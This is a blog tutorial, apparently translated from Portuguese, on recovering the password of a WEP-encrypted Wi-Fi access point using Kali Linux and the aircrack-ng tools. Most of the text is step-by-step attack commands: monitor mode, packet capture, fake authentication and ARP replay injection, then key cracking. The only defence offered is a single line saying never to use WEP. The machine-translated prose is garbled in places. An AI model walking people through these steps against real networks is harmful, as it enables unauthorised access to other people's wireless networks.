Tutorial: Pentest in Wi-Fi routers that use WEP encryption (Ethical Hacking)

Hello to all

Today I want to show you guys how it can be done to find the password of a Wi-Fi Access Point configured with WEP encryption

For this tutorial I'm using Linux Kali

To install and configure the Kali Linux in Virtual Box you can follow our tip


Remember that if you are using the Virtual Box, u will need a network card Wi-Fi USB and add it in the menu “Devices/USB Devices” and select the USB card so that it can be recognized by the VM, Now if u are running directly on the metal then he will recognize the card itself that you have on your PC or Note.

Terminal Type a ifconfig to check what your wireless network card in our case is the wlan0 then enter the following:

# airmon-ng start wlan0

This will put the card into monitor mode note that will create a new interface in the case mon0, after this type:

# airodump-ng -i mon0

You will see a screen similar to this

ScreenHunter_21 Apr. 24 10.18


In the screenshot above you can see all the networks in range in case you want is to have cripotografia WEP and should take note of the following information BSSID Channel is where you like CH and the ESSID what is the name of the network.

With this information in hand we run the next command:

# airodump-ng --ivs -w wep --channel 6 -bssid 00:00:00:00:00:01 mon0

Where u should replace wep the name you want, this is just the prefix of the file that will be generated, ex: wep-01.ivs, wep-02.ivs etc...

Replace the value in –channel by the number of its channel obtained in the field CH the first command that was executed

Replace the value in –bssid by the number of its BSSID BSSID field obtained in the primero command that was executed

If everything is correct u see a screen similar to the one below:

ScreenHunter_22 Apr. 24 10.42


The next step is to stop running the above command and generate some traffic so we can make the break password, We can simulate some tentative association with the AP and generate some traffic with commands:

# aireplay-ng -1 0 -e dlink-test-a 00:00:00:00:00:01 -h 00:00:00:00:00:02 mon0
# aireplay-ng -3 -b 00:00:00:00:00:01 -h 00:00:00:00:00:02 mon0

Not first command replaces the value of -and the value of their ESSID obtained in the first command

Where is the value -a u will put the BSSID Access Point and the value of -h u will put your MAC Address.

Not second command replaces the value of -b by its BSSID and the amount of -h u will put your MAC Address.

Let the second aireplay-ng running time to generate data sufficient to break the encryption

Will be more or less well

ScreenHunter_21 Apr. 24 10.42


Now comes the best part, to discover the password of wi-fi after taking some time, in my case a 5min. just run the following

# aircrack-ng -a 1 wep-01.ivs

Where of course u should change wep-01.ivs by ivs file that generated vc, then the password will be seen in the following way:

ScreenHunter_22 Apr. 24 10.47

In the above case the password is 12345

Only one way to safeguard against this, nunca jamais use WEP!!!

How to find the password of any wifi router that has WPS activated regardless of the type of encryption used


How to find the password of the wifi router with WPA2 encryption enabled see this hint here


I hope you enjoyed.

Do not forget to share and subscribe to our blog.

Hugs and until the next